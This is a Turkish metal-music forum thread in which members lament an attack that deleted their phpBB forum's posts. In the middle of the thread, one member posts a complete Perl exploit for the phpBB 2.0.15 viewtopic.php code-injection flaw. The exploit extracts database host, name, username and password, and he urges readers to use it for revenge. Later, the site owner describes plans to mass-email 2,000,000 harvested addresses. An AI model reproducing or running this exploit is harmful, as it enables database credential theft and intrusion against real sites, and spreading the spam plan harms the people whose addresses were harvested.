Saldırı

[Karga]

Sitemizi çekemeyenler hala saldırı yapıyorlar.Bu seferde mesajları silmişler.Sanırım en iyi forumuz ve çekemiyorlar....
BAŞKA BİRŞEY DEMEK İSTEMİYORUM.
_________________

[nuitari]

önlemimizi almışmıydık????

[Sİebenburgen]

olcak iş deil..yeni albumler eklicem ama onlarda silinmesin ..

[ArsoN]

exploit işte nolacak başkalarının yazdığı kodlarla saldırıyorlar. olay şu anladığım kadarıyla adam adminlerden birinin kullanıcı adı ve şifresin ibulup yönetim panelinden temizlik yapıyor. merak edenler ve intikam almak istiyenler aşağıdaki kodu kullansın. yada www.tahribat.com DENYO LAUNCER programını indirip saldırsın.

#!/usr/bin/perl

# ************************************************** ************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# ************************************************** ************

use IO::Socket;

print "+-----------------------------------------------------------------------+rn";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |rn";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |rn";
print "+-----------------------------------------------------------------------+rn";

if (@ARGV < 3)
{
print "Usage:rn";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRINGrnrn";
print "SERVER - Server where PhpBB is installed.rn";
print "DIR - PHPBB directory or / for no directory.rn";
print "THREADID - Id of an existing thread.rn";
print "COOKIESTRING - Optional, cookie string of the http request.rn";
print " Use this when a thread needs authentication for viewingrn";
print " You can use Firefox in combination with "Live HTTPrn";
print " Headers" to get this cookiestring.rnrn";
print "Example 1 (with cookiestring):rn";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 "
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09" rnrn";
print "Example 2 (without cookiestring):rn";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 rn";
exit();
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];

$serv =~ s/http:////ge;
$delimit = "GvRSecureD";

$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "$dbhost.";
$sploit .= "$delimit.";
$sploit .= "$dbname.";
$sploit .= "$delimit.";
$sploit .= "$dbuser.";
$sploit .= "$delimit.";
$sploit .= "$dbpasswd.";
$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.nn";

print "[+] Connecting OKn";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1rn";
print $sock "Host: $servrn";
if ( defined $cookie) {
print $sock "Cookie: $cookie rn";
}
print $sock "Connection: closernrn";


$succes = 0;

while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}

close($sock);

if ($succes == 1) {
print "OKn";
sleep(1);
print "[+] Database Host: " . $array[0] . "n";
sleep(1);
print "[+] Database Name: " . $array[1] . "n";
sleep(1);
print "[+] Username: " . $array[2] . "n";
sleep(1);
print "[+] Password: " . $array[3] . "n";
sleep(1);
} else {
print "FAILEDn";
}
_________________


MP3 FILES
"Ride For Vengeance" (3677 KB) from "Once Sent From The Golden Hall"
""Metalwrath" (3138 KB) from "The Avenger"
"Masters Of War" (3839 KB) from "The Chrusher"
"Death In Fire" (4741 KB) from "Versus The World"
" "An ancient sign of coming storm" from "Fate of norns"

[Eriny_Alekto]

arkadaşlar tekrar geçmiş olsun ama insan emeğine saygısı olmayan bu "insanlara (!)" karşı bi önlem alamıyomuyuz acaba. yani bi hafta sonra tekrar bunun olabilme ihtimali varsa çok kötü.
_________________
Sİ VİS PACEM PARA BELLUM

[nuitari]

ya bişeyi merak ettim sitenin kopyasını kendimiz alamazmıyız pcmize...yani illaki sağlayıcımızın alması mı lazım???

[darthmaul88]

hocam kim saldırıyo anlamadım ayrıca arson verdiğin koddları ne yapacağız
_________________
KARANLIK GÜÇ SİZİNLE OLSUN

[nuitari]

bu şekilde bi önlem alınmadan siteyi doldurmaya devam etmek sinirlerimizi bozmaktan başka bi işe yaramaz...ayrıca madem adminlerden birinin hesabına girdiler IPleri orda yazar sanırım...bu adamları bulamazmıyız..böle karşı saldırıyla olmaz medeniyetin sınırı buraya kadar bu adamları dövmek lazım artık.

[ArsoN]

[ArsoN]

[Zarathustra]

Bunu yapan adamlar için söylenecek pek çok söz var... ama forum ahlakı açısından söylenmez şimdi burda..
_________________
Bütün hayata sırt çevirmişim rüyamda.
Gece ve mezar bekçisi olmuşum
yukarda,ölümün o ıssız şahikasında.
Tabutlarını bekliyormuşum yükseklerde:
küf kokulu kubbeler zafer simgeleriyle doluydu.
Alt edilmiş hayat camdan tabutlardan bana bakıyordu

[legba1862]

BUNU YAPANI BİR YAKALASAM....

SANIRIM BU İŞ FREE SERVERLARLA OLMAYACAK ....

OTURUP ADAM GİBİ KARAR VERMEK LAZIM...

[Karga]

Ewt legba ya para bulup siteyi alıcaz.yada olmayatacak böyle.

Olaya neredeyse canlı tanığım.onlinedım.kapadım siteyi.5 dakka içinde darkdreamed msnde site niye açılmıyor dedi.Baktım hemen siteye girince site kapalıdır uyarısı veriyor.Yönetim panelinden açtm hemen.Siteyi kapat seçilmiş.Açtım baktım mesajlar yok.Açıkçası bir şekil bulamazsak ben zaten forum olayını bırakıyorum.günlerdir hepimizin verdiği emekler 2 dakika içinde göz göre gidince sinir bir hayli taşıyor.Bence artık rapçi saldırı falanda değil bu.Rakipler bile olabilir.Çünkü ötekiler açık hiç kapanmadı.Sadece saldırı yapıldı onlara ama dikakt ederseniz hala aynı şekilde devam edyorlar.Bence bizim başarımızı çekemiyorlar.İnsanın aklına herşey geliyor.Napalım bulucaz inşallah bir çaresini...
_________________

[nuitari]

evet iki kıçıkırık rapçinin bunları yapabilmesi bana da mucizevi geliyor...özellikle metaltr admininin verdiği cevaptan sonra benimde aklıma bazı ihtimaller gelmeye başladı!!!!neyi paylaşamıyoruz anlamış değilim.

[Karga]

Başarıyı dostum başarıyı bence.Başka metal forum sitelerinde adminlerin yaptığı açıklamalar benide kötü düşüncelere itti baya.Eğer saldırı olmasaydı en yakın zamanda en iyi siteler den biri olacaktık.Bu şekil başka bir site gösterseize bana.Online metal radyosu olan.Bu şekil metal müziğe benzeyen.Bütün arama motorlarına ekleme yapmıştım msiteyi , aysıca paylaşım linklerine de...Elimde 2.000.000 mail ve bunları göndericek programım mevcuttu .daha bugün buldum.Sitein reklamı açısından 2.000.000 kişiye aynı anda sitemizi tanıtacaktım.Sadece bu kadar değil daha bir çok şey yapacaktım gerek reklam olsun , gerek dizayn olsun.Ama artık ne zevkim nede şevkim kaldı bunları yapmak için...
Ve dediğim gibi rapçi olduğunu hiç sanmıyorum bu iblislerin.
Aslında rahatlama başlığı açim bir tane..Oraya girip bu deyyuslara istediğiniz küfürü aklınızdan geçenleri yazın.

Ayrıca nightmareforum@yahoo.com adresine herkes mail göndersin.bütün üyeler yarın öbürgün site hiç açılmazsa gene ve biz daha güvenli yeni bir site yapmak zorunda kalırsak oradan hepinize ulaşalım...
Bkarsınız yarın lastviking gibi offline olur burasıda..
_________________